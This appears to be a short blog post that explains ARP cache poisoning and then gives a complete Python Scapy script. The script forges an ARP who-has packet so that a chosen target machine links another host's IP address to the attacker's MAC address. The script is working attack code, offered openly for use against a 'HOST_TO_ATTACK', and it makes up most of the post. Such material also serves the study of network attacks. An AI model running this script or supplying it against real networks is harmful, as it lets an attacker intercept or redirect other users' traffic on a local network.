ARP poisoning using Python and Scapy

What is ARP poisoning
Machines on a TCP/IP local area network identify each other and communicate using the physical addresses of their network adapters (MAC address). Every machine keeps a list (cache) of neighboring machines and their MAC addresses, if that list is contaminated, i.e a machine on that list will have the wrong MAC address. All communication to that machine will be directed to the wrong machine.
ARP poisoning is the method of tricking a machine to save data on about an IP address with the wrong MAC address in it’s ARP table.

How the script works
The following script gets two arguments
HOST_TO_ATTACK – The machine we want to poison
HOST_TO_IMPERSONATE – The machine we want the poisoned machine to think we are, so when it want to communicate with that machine, it will actually communicate with us.

The script queries the target machine for it’s mac address by sending an who-has packet to broadcast.
The who-has packet has fake source IP address coupled with the attacker MAC address.
When the target gets the who-has packet the target will store the false IP and MAC address data in it’s ARP table.

#!/usr/bin/python

# Python arp poison example script
# Written by aviran
# visit for more details aviran.org

from scapy.all import *
import sys

def get_mac_address():
	my_macs = [get_if_hwaddr(i) for i in get_if_list()]
	for mac in my_macs:
		if(mac != "00:00:00:00:00:00"):
			return mac
Timeout=2

if len(sys.argv) != 3:
    print "Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE"
    sys.exit(1)

	
my_mac = get_mac_address()
if not my_mac:
	print "Cant get local mac address, quitting"
	sys.exit(1)

packet = Ether()/ARP(op="who-has",hwsrc=my_mac,psrc=sys.argv[2],pdst=sys.argv[1])

sendp(packet)

One thought on “ARP poisoning using Python and Scapy”

Leave a Reply

Your email address will not be published. Required fields are marked *